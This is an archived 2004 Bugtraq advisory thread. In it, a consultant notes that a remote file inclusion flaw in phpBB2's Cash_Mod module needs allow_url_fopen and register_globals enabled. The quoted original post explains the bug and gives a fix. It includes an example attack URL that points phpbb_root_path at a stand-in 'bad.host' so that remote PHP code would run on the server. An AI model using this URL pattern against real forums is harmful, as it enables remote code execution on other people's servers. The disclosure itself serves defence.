[37401] in bugtraq
Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
daemon@ATHENA.MIT.EDU (Rafael San Miguel Carrasco)
Thu Nov 18 15:39:30 2004
Message-ID: <419CD7DE.1070304@yahoo.es>
Date: Thu, 18 Nov 2004 18:11:58 +0100
From: Rafael San Miguel Carrasco <smcsoc@yahoo.es>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
In-Reply-To: <20041118044742.16170.qmail@www.securityfocus.com>
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
Let me just point out that this vulnerability can only be exploited if
two options in php.ini are enabled:
- allow_url_fopen
- register_globals
The first one allows to access and retrieve http resources from fopen;
the second lets a user specify GET or POST parameters that will be
translated into PHP variables.
For more information about PHP insertion and how it can be recognized
and exploited:
http://www.fistconference.org/data/presentaciones/exploitingwebapplications.tar
Greetings.
-------------------------------
Rafael San Miguel Carrasco
Security Consultant
Davinci Consulting
-------------------------------
Jerome ATHIAS wrote:
>Hi all
>
>phpBB is a very popular message board using modules extensions.
>
>One of these module – Cash_Mod is a very popular one and is used by many people. It has critical vulnerabilities, one of them letting anyone inject malicious PHP code that will be executed on the server side.
>
>Let’s start :
>
>In file /admin/admin_cash.php
>
>…..
>if ( !empty($setmodules) )
>{
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
>$menu = array();
>admin_menu($menu);
>….
>
>First, nothing seems wrong! It’s just a normal piece of code with “include” functions, but
>$phpbb_root_path & .$phpEx – are *NOT* define yet!
>
>
>I don’t know why, but someone decided to define these variables later in the code :
>
>……
>//
>// Let's set the root dir for phpBB
>//
>$phpbb_root_path = "./../";
>require($phpbb_root_path . 'extension.inc');
>require('./pagestart.' . $phpEx);
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
>
>…..
>
>Well, any user can rewrite these parameters with GET or POST requests.
>
>Example :
>http://victim.host/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/
>
>
>Fix :
>Set all default parameters after “if ( !empty($setmodules) )”
>
>Example :
>
>//
>// Let's set the root dir for phpBB
>//
>$phpbb_root_path = "./../";
>require($phpbb_root_path . 'extension.inc');
>require('./pagestart.' . $phpEx);
>include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);
>
>if ( !empty($setmodules) )
>{
>include($phpbb_root_path . 'includes/functions_cash.'.$phpEx);
>$menu = array();
>admin_menu($menu);
>
>
>Thank you rofl!
>
>
>
